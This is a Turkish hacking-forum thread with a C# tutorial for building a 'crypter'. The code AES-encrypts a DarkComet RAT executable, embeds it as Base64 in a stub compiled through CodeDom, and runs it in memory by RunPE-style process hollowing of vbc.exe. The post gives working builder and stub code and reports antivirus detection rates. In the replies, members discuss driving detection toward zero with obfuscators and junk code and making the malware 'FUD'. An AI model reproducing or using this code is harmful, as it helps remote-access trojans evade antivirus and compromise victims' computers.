Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Programlama
> C# j# vb.net (.NET dilleri)



C#: Crypter

C# j# vb.net (.NET dilleri)

Yeni Konu aç Konu Kapatılmıştır
 
Seçenekler
Alt 22-05-2018   #1
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
05/2018
Mesajlar
Konular
4


  
C#: Crypter





Şimdi öncelikle DarkComet RAT'da oluşturduğumuz executableyi nasıl cryptleyeceğimizi görelim.

Kullanılacaklar ;
  • CodeDom
  • CMemoryExecute class'ı
  • BASE64 ve AES256

Şimdi öncelikle crypterımızın run-time olmasını istiyoruz. O yüzden bir Run PE'ye ihtiyacımız var. Onun için şu hastebin adresinden kodlarımızı just text şeklinde alıyoruz. Form projesi açıyoruz. Aldığımız kodları bir txt'e yapıştırıyoruz. Sonra Resources'a ekliyoruz.

https://hastebin.com/dihelamuzo.cs



Bu burada kalsın, sonra düzenleyeceğiz.
Şimdi formumuzu düzenliyelim.



Buttondan executable seçilecek, yolunu ise textbox'a yazdıracak. Oluştur butonundan da compile edecek.

Hemen class'ımızda OpenFileDialog class'ını tanımlayalım.

Kod:
        OpenFileDialog ofd = new OpenFileDialog();
Sonra button1'in yani Text'i ... olan button'un eventine gidelim.

Kod:
            ofd.Filter = "Executable dosyaları|*.exe";
            ofd.Title = "Cryptlenecek dosyayı seç";

            if (ofd.ShowDialog() == DialogResult.OK)
            {
                textBox1.Text = ofd.FileName;          
            }
Şimdi button2'in yani Text'i Oluştur olan button'un eventine gidelim.

Kod:
            if(!string.IsNullOrEmpty(ofd.FileName))
            {
                Rfc2898DeriveBytes rfc = new Rfc2898DeriveBytes("IstediginizSifre", Encoding.UTF8.GetBytes("IstediginizSalt")); //Password ve IV
                RijndaelManaged rm = new RijndaelManaged();
                MemoryStream ms = new MemoryStream();
                ICryptoTransform ict = rm.CreateEncryptor(rfc.GetBytes(32), rfc.GetBytes(16)); //256,128
                CryptoStream cs = new CryptoStream(ms, ict, CryptoStreamMode.Write);
                                cs.Write(File.ReadAllBytes(ofd.FileName), 0,File.ReadAllBytes(ofd.FileName).Length);

                //AES256

                CSharpCodeProvider ccp = new CSharpCodeProvider();
                CompilerParameters cp = new CompilerParameters();
                cp.OutputAssembly = "Crypted.exe";
                cp.GenerateExecutable = true;
                cp.CompilerOptions += "/unsafe"; //CMemoryExecute.cs Class'ı unsafe bir class olduğu için böyle compile etmesini istememiz lazım, yoksa compile etmez.
            }
Burada eğer seçmişse kodlar başlatılıyor.
İlk öncelikle AES256 için password ve IV belirtiyoruz.
Daha sonra cryptlenecek dosyanın bytelarını alıp cryptlenmiş halini MemoryStream'e yazdırıyoruz.

Daha daha sonra CodeDom'da cryptlenmiş dosyanın compile edilecek ismini seçiyoruz.
Bir de CMemoryExecute.cs class'ı unsafe bir class olduğu için unsafe optionu ekliyoruz.
Ama daha button2'in kodları bitmedi.
Source.txt'i düzenleyelim.
System.Security.Cryptography ve System.IO librarylerini ekliyelim.
Sonra bir Main metodu oluşturalım.
Bu da decrypt edip çalıştıracak memoryde.

Kod:
        Rfc2898DeriveBytes rfc = new Rfc2898DeriveBytes("IstediginizSifre", System.Text.Encoding.UTF8.GetBytes("IstediginizSalt")); //Password ve IV
        RijndaelManaged rm = new RijndaelManaged();
        MemoryStream ms = new MemoryStream();
        ICryptoTransform ict = rm.CreateDecryptor(rfc.GetBytes(32), rfc.GetBytes(16)); //256,128
        CryptoStream cs = new CryptoStream(ms, ict, CryptoStreamMode.Write);
		cs.Write(Convert.FromBase64String([Byte]),0,Convert.FromBase64String([Byte]).Length);	
		Run(ms.ToArray(), @"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe");
Şimdi diyeceksiniz ki ;
"[Byte] bir variable değil ki nasıl tanıyacak? "
Biraz daha okuyun, anlarsınız.
Şimdi button2 eventinden devam ediyoruz.

Kod:
                string source = Properties.Resources.Source.Replace("[Byte]","\""+Convert.ToBase64String(ms.ToArray())+"\"");
                ccp.CompileAssemblyFromSource(cp,source);
Gördüğünüz gibi o [Byte]'yi Replace edip base64 edilmiş halini veriyoruz ve en sürpriz! Compile edip bitiriyoruz.

Şimdi programı açıp EXE'yi seçip build edip taratalım.

Sonuç : https://me-tadefender.opswat.com/res...gular/overview

10/36

Siz bunu geliştirebilirsiniz. Benim Crypter hakkında aslında zerre bilgim yok, sadece bu şekilde mantığını biliyorum.
    


___________________________________________

Basit bi ironiyi bile anlayamıyo çünkü o aydın geçinen aklın

Yobazdan yok bi farkın


Konu Hurr tarafından (22-05-2018 Saat 23:07 ) değiştirilmiştir..
 Offline  
 
Alt 22-05-2018   #2
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
05/2018
Nereden
127.0.0.1/24
Mesajlar
Konular


  


Eline sağlık test ettiniz mi ?
Çalışıyor mu

Daha farklı yazanlarda var runexecute(Runpe) kullanıyorlar source code'de
    
 Offline  
 
Alt 22-05-2018   #3
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
05/2018
Mesajlar
Konular
4


  


Alıntı:
Kerur´isimli üyeden Alıntı Mesajı göster
Eline sağlık test ettiniz mi ?
Çalışıyor mu

Daha farklı yazanlarda var runexecute(Runpe) kullanıyorlar source code'de
Çalışıyor.
    


___________________________________________

Basit bi ironiyi bile anlayamıyo çünkü o aydın geçinen aklın

Yobazdan yok bi farkın

 Offline  
 
Alt 22-05-2018   #4
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
05/2018
Nereden
*.dmg
Mesajlar
Konular
4


  


FUD yapmayı da öğretebilirsen daha güzel olur, eline sağlık.
    


___________________________________________

 Offline  
 
Alt 22-05-2018   #5
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
07/2014
Mesajlar
Konular


  


Emeğine sağlık üstad
    


___________________________________________


© 2014 THΣMΛGıCШOЯD
 Offline  
 
Alt 22-05-2018   #6
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
05/2018
Mesajlar
Konular
4


  


Teşekkür ederim.
    


___________________________________________

Basit bi ironiyi bile anlayamıyo çünkü o aydın geçinen aklın

Yobazdan yok bi farkın

 Offline  
 
Alt 22-05-2018   #7
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
12/2017
Nereden
New Jersey
Mesajlar
Konular


  


Emeğine sağlık
    


___________________________________________

Bir Türk'e İmkansız de Sonra Otur ve İzle 😉

 Offline  
 
Alt 22-05-2018   #8
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
05/2018
Mesajlar
Konular
4


  


Teşekkürler, obfuscator kullanınca 3/36 oluyor.
Siz de böyle yöntemler kullanabilirsiniz.
Obfuscator, Junkcode, değişik şifrelemeler.
    


___________________________________________

Basit bi ironiyi bile anlayamıyo çünkü o aydın geçinen aklın

Yobazdan yok bi farkın

 Offline  
 
Alt 23-05-2018   #9
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
12/2017
Nereden
Türkiye
Mesajlar
Konular


  


Kendi Mantğınızla yaparsanız 0/36 bile çıkabilir
    
 Offline  
 
Alt 23-05-2018   #10
  • İstihbarat Tim Asistanı
  • Üye Bilgileri
Üyelik tarihi
07/2017
Nereden
ANGARA
Yaş
16
Mesajlar
Konular


  


eline sağlık
    


___________________________________________

biten bitmiyor giden gitmiyor kalan bitiyor hayat bitiyor sevda ölüyor insan bitiyor ve buna yaşam deniyor
 Online  
 
Konu Kapatılmıştır

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2018

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı



Google+

wau

Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.